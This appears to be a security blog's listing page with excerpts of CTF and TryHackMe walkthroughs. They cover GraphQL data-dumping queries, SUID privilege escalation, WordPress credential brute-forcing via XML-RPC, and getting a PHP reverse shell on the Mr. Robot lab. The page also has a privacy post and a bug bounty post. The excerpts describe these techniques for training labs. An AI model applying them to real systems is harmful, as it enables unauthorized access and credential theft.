Skip to main content

Posts

Hacker 101 CTF Walkthrough: BugDB v3

 This CTF like the previous one too has some mutations in it so likely we have to play with mutations. It's always a good idea to give introspection query a try with GraphQL voyager which retrieved following result: We can see something different in this graph i.e attachments. That being said lets explore the documentation to carve a query that returns all the data available on the endpoint query { user { edges { node { id username bugs { edges { node { id private reporterId attachments { edges { node { id bugId filename } } } } } } } } } } This query returns all the data as follows.

Hacker 101 CTF Walkthrough: BugDB v2

 This is the second CTF on Hacker 101 related to GraphQL. Let's dive into it. Learning the trend from previous CTF i.e BugDB v1 I didn't dive into the introspection query graph straightaway this time rather I opened the docs of this GraphQL endpoint which showed that this time we have the feature of mutation as well which means that we can post/modify data on the server. Interesting.   Alright, Let's follow the trend and read the docs further in Query   We can query for user, find user/bug and also all bugs and all users as well. Let's carve a query out of it that queries most of the data if not all out of the endpoint

My Transition to More Privacy-Focused Internet.

  Back in October 2020 I watched Social Dilemma (A Netflix Documentary) on the recommendation of a friend, it was a documentary made on side effects of social media and those side effects were mentioned by none other than the manufacturers of those tech giants, people holding executive positions, engineering positions in Facebook, Google, YouTube, Pinterest, etc explained how social media is becoming a social dilemma of this century. I won't go into detail about that documentary, but this documentary ignited a spark within me. In response to The Social Dilemma, I've made lots of changes to my internet routine, one of it is, shifting to @DuckDuckGo with @firefox , it's way better than Google if you consider privacy. Must give it a try! — Najam Ul Saqib (@NjmUlSqb) October 12, 2020

Lessons learned while escalating privileges on Vulnversity

After a long while, going through exams and other commitments I decided to play on TryHackMe. This time it was  vulnversity  room, I solved it and learned a lot of new stuff. Infosec is something where you get to learn new things every day (if you're involved in it). So I decided to mention a few things that I learned in this room for others to learn from it. I think most of the room's content was easy, like nmap scan, directory brute-forcing, etc but the last section where we are asked to perform privilege escalation to get the root permissions and ultimately catch the flag was very interesting. I will be talking about "Task 5: Privilege Escalation" here: First of all, the concept of SUID is used here, now what is SUID? I will try to explain it in the simplest of the words, SUID is a bit you can say a flag which is when true on a particular file, it gives that user to execute that file? Now, what's so special about it? This is temporary permission, that file u

Hacker 101 CTF Walkthrough: Petshop Pro

I am back with another walkthrough to one of the  HackerOne 's CTF Petshop Pro . Let's look at the interface of this web page.

How I got my first private invitation to a bug bounty program?

Bug bounty platforms are rapidly gaining popularity among ethical hackers and penetration testers, they provide crowdsource solutions to different companies, hackers look for security loopholes in the websites and in turn they get paid for a valid submission. But as such platforms are gaining popularity and more and more people are finding security bugs in public programs resulting in lesser vulnerabilities to be found left, private invitations are a better choice in this scenario, as the word "Private" explains the story, not everyone is allowed to hack on the private program like public ones. Only selected hackers based on their skill set and achievements are invited to private programs. Hence, I got invited to one of the private programs, it is pretty confusing for newbies to know that how they can be invited to a private program but don't worry I'll make it clear & concise for you.  HackerOne  is a famous and probably number one bug bounty platfor

Important points I learned from Mr Robot CTF

I did the Mr. Robot CTF today from www.tryhackme.com, I thought it would be better to share the lessons I learned from Mr. Robot's CTF rather than writing a walkthrough (as there are tons of walkthroughs available online on Mr. Robot) GoBuster is better than DirBuster: I ran gobuster on the machine for quite some time but it didn't capture some pages which also included robots.txt, robots.txt is an important page and it carried some useful information, GoBuster detected robots.txt so in this case GoBuster performed better If its "Wordpress", go nowhere but "WPScan": If the target is wordpress-based then WPScan is your go-to tool for enumeration and bruteforcing, I tried different tools for bruteforcing credentials on the machine like Burp Intruder, Hydra, MetaSploit etc but they all took a lot of time whereas bruteforcing performed by WPScan (using XML-RPC which I'll explain next) was fast and very efficient. XML-RPC in Wordpress: WPS

Not getting Shell on Mr.Robot CTF on TryHackMe?

Well, this was my first machine on THM and I pulled my hairs on not getting the shell when I was doing all the stuff just right. It was Mr.Robot's CTF, I tried literally everything to get the shell, I tried PHP reverse shell, meterpreter session, metasploit's wp_admin module, malicious Wordpress plugins but of no avail. I turned to TryHackMe's discord server to check what am I doing wrong, what came out was very funny and frustrating at the same time 😅 Lets take an example of PHP Reverse Shell, when you submit the PHP shell code in 404.php page, you have to configure two things, one is your IP(LHOST) and other is your Port. I was putting my eth0/wlan0's IP address into the LHOST and I was never getting anything back on netcat. As TryHackMe uses OpenVPN proxy to connect to their server so your eth0/wlan0's IP is not your LHOST, after connecting to OpenVPN, run IP address  command and use the tun0  IP address, this is your listening host aka LHOS